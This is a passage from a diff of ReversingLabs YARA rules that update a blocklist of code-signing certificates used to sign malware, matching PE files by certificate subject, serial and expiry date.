-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Y.L. Knafo, Ltd." and pe.signatures [ i ] . serial == "19:7d:c3:2d:91:54:58:95:35:62:d2:fe:78:bf:24:68" and 1575331200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kolorit" and ( pe.signatures [ i ] . serial == "00:9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" or pe.signatures [ i ] . serial == "9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" ) and 1608076800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "14a292da-36c1-5a37-b27e-20c982e44c25"
+		id = "cbc0c6ca-fab2-531e-b368-4d3fdc72509f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14822-L14838"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "66c2cd84fccedd2afef00495c49d0c2844e2e5e190e6a859d2970e8ddb4a35c2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7806-L7824"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e2044c6ddb80f3add13dfc3b623d0460ce8e9a66c5a98582f80d906edbbbd829"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19183,21 +43848,21 @@ rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Apex Tech, SIA" and pe.signatures [ i ] . serial == "7c:0b:e3:d1:47:87:35:1e:31:56:f5:f3:7f:2b:36:63" and 1523318400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREVOKAPITAL, s.r.o." and ( pe.signatures [ i ] . serial == "00:a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" or pe.signatures [ i ] . serial == "a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" ) and 1608076800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c78d42bc-f8ca-579a-af49-ba9c7b63ef07"
+		id = "c2c32499-4b0d-51ad-a10e-1ddd7218df84"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14840-L14856"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "02ec52e060a6b8b3edfad0a1f5b1f2d6c409645d5233612d0d353ad74bcd4568"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7826-L7842"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b3a31a54132fd8ca2c11b7806503207a4197f16af78693387bac56879b5e1448"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19207,21 +43872,21 @@ rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "05:05:4f:de:a3:56:f3:dd:7d:b4:79:fa" and 1474436511 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSE, d.o.o." and pe.signatures [ i ] . serial == "33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" and 1608076800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d468530e-8a51-583e-a108-e409f0144165"
+		id = "7d4033b8-da1d-55f5-aa80-f96636650633"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14858-L14874"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "28ad7e9c75a701425003cde4a7eb10fa471394628cd5004412778d8d7cddb50b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7844-L7862"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b965e897b42c39841e663cc144cf6e4a81fc9bcb64ce3a15a7ca021e95866b08"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19231,21 +43896,21 @@ rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "pioneersoft" and pe.signatures [ i ] . serial == "08:aa:a0:69:e9:25:17:f2:1c:e6:7c:a7:13:f6:ea:63" and 1368403200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEHTEH d.o.o., Ljubljana" and ( pe.signatures [ i ] . serial == "00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" or pe.signatures [ i ] . serial == "92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" ) and 1607040000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "376da749-3cd4-5e37-b1ee-013e839f98ce"
+		id = "75ec52c5-4c59-51d8-bd9b-928c75d3521a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14876-L14892"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5febbce8c39440bfc4846f509f0b1dd4f71a8b4dc24fa18afb561d26e53c2446"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7864-L7880"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a9ee8534d89b8ac8705bb1777718513a28e4531ed398f482f46a72f2760af161"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19255,21 +43920,21 @@ rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "1b:7b:54:e0:dd:4d:7e:45:a0:b4:68:34:de:52:65:8d" and 1476662400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lotte Schmidt" and pe.signatures [ i ] . serial == "28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" and 1608024974 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "44af31cc-e0c9-5f3f-9645-a0453bc81e62"
+		id = "92baa26f-1352-53ed-bb9f-0a632e471dd5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14894-L14912"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "da7415d0bc0245dea6a4ec325da5140c79c723c20fb7c04ff14f59a3089a5c88"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7882-L7900"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b3e6927abfce69548374bfd430a3ae3a1c5a8d05f0f40e43091b4d12025c5b1a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19279,21 +43944,21 @@ rule REVERSINGLABS_Cert_Blocklist_B63E4299D0B0E2Dcdaeb976167A23235 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Baltservis LLC" and ( pe.signatures [ i ] . serial == "00:b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" or pe.signatures [ i ] . serial == "b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" ) and 1604102400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Paarcopy Oy" and ( pe.signatures [ i ] . serial == "00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" or pe.signatures [ i ] . serial == "c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" ) and 1608076800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8b050402-d5d3-5733-9a72-02386d850a04"
+		id = "d2988928-4ef3-56bf-a407-f735756c7f81"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14914-L14930"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0bb14ececa3a78e1a2e71cfdee8bc57678251b15151d156ef5fa754b2438ee35"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7902-L7920"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "66a340f169e401705ba229d2d4548cef1a57bf1d2d320b108d12b2049b063b92"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19303,21 +43968,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "1d:ab:ae:61:67:05:f5:a5:11:52:ea:c4:84:23:f3:54" and 1470960000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tekhnokod LLC" and ( pe.signatures [ i ] . serial == "00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" or pe.signatures [ i ] . serial == "9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" ) and 1605744000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f315cdda-4b95-534d-94db-9a04e2da6385"
+		id = "358391b7-649b-5792-b4bd-d97b388c5d12"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14932-L14948"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ca613e4b45b9bb1ef7564b9fc6321bccc0f683298de692a3db2bf841db9010ef"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7922-L7938"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "45636ea33751fea61572539fe6f28bccd05df9b6b9e7f2d77bb738f7c69c53a2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19327,21 +43992,21 @@ rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVERCYBER LTD" and pe.signatures [ i ] . serial == "50:d0:8f:3c:9b:f8:6f:ba:52:cf:59:2b:4f:e6:ea:cf" and 1518134400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROFF LAIN, OOO" and pe.signatures [ i ] . serial == "09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" and 1603497600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "78d2adb9-fc1c-5f48-80cb-3f1bd12b6ba5"
+		id = "8415406b-ede8-5404-8208-34eb649f7325"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14950-L14966"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c2dcea21c7a3e3aef6408f11c23edbce6d8f655f298654552a607a9b0caabb28"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7940-L7958"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c60e1ccf178f03f930a3bc41e9a92be20df0362f067ed1fcfc7c93627a056d75"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19351,21 +44016,21 @@ rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CFES Projects Ltd" and pe.signatures [ i ] . serial == "7c:7f:c3:61:6f:31:57:a2:8f:70:2c:c1:df:27:5d:cd" and 1522972800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAVANAGH NETS LIMITED" and ( pe.signatures [ i ] . serial == "00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" or pe.signatures [ i ] . serial == "ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" ) and 1608640280 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "19c9e100-b017-5b5c-8e8f-c94ea9e228c2"
+		id = "f783bad3-f350-5a74-8e3f-5b7220e4de8f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14968-L14984"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "69865935e07ea255a5d690e170911b33574ea61550b00bebc2ceff91ba9a33da"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7960-L7976"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "69ce1512d7df4926ee2b470b18fbe51a2aa81e07b37b2536617d6353045e0d19"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19375,21 +44040,21 @@ rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5000 LIMITED" and pe.signatures [ i ] . serial == "73:ed:1b:2f:4b:f8:dd:37:a8:ad:9b:b7:75:77:45:92" and 1528243200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STROI RENOV SARL" and pe.signatures [ i ] . serial == "47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" and 1607644800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5181b6e4-6a25-58f6-88c5-0eae98250648"
+		id = "51941c0d-a7a1-5c17-bef8-290e5db66fb7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14986-L15002"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cf2e4c0dd98efb77c28b63641196c83e60afc0d6ab64802743c351581506dbb5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7978-L7996"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f82214f982c9972e547f77966c44e935e9de701cc9108ceca34a4fede850d243"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19399,21 +44064,21 @@ rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RAFO TECHNOLOGY INC" and pe.signatures [ i ] . serial == "21:1b:5d:fe:65:bc:6f:34:bc:9d:3a:54" and 1526717931 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGLE DVORSAK, d.o.o" and ( pe.signatures [ i ] . serial == "00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" or pe.signatures [ i ] . serial == "a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" ) and 1606867200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b35f2db-ebf1-5533-858c-644dbd6dfb2b"
+		id = "32cefe84-b305-5542-a5d3-1832dcbf6d61"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15004-L15020"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fbdd37e050d68c4287e897f050a673aea071df105a35b07475d3233da3f03feb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7998-L8014"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "89ca9f1c5cf0b029748528d8c5bb65f89ee05877bfdc13b4ce3d2d3e7feafb5d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19423,21 +44088,21 @@ rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "54:00:d1:c1:40:65:28:b1:ef:62:59:76" and 1474266628 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osnova OOO" and pe.signatures [ i ] . serial == "0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" and 1604016000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9b63f06d-9808-5936-aad2-d387c74eccdd"
+		id = "5d506480-96ca-5e71-9fb2-185b2f8ddc6c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15022-L15038"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ab908ef0fca56753bcba8bc85e2fdf5859b4e226c179ec5c6eb6eb3dc4014a8e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8016-L8034"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "186b66283491cfebcaade57b1010ce4304c08ddb131153984210c2c7025961aa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19447,21 +44112,21 @@ rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Zhang" and pe.signatures [ i ] . serial == "01:34:72:d7:d6:65:55:7b:fa:0d:c2:1b:35:0a:36:1b" and 1470960000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POKEROWA STRUNA SP Z O O" and ( pe.signatures [ i ] . serial == "00:c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" or pe.signatures [ i ] . serial == "c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" ) and 1606089600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4a7130ad-8b66-52a1-afd2-6d10776b4451"
+		id = "453b5da2-ae26-5005-8a56-1105a960fde6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15040-L15056"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "37f0f64e2d84ef6591e1f07a05abca35b37827d26c828269fb5f38d8546a60a7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8036-L8052"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0625800fcb166b56cab2e16d0d757983a6f880b68627ed8c3c38419dd9a32999"
 		score = 75
 		quality = 90
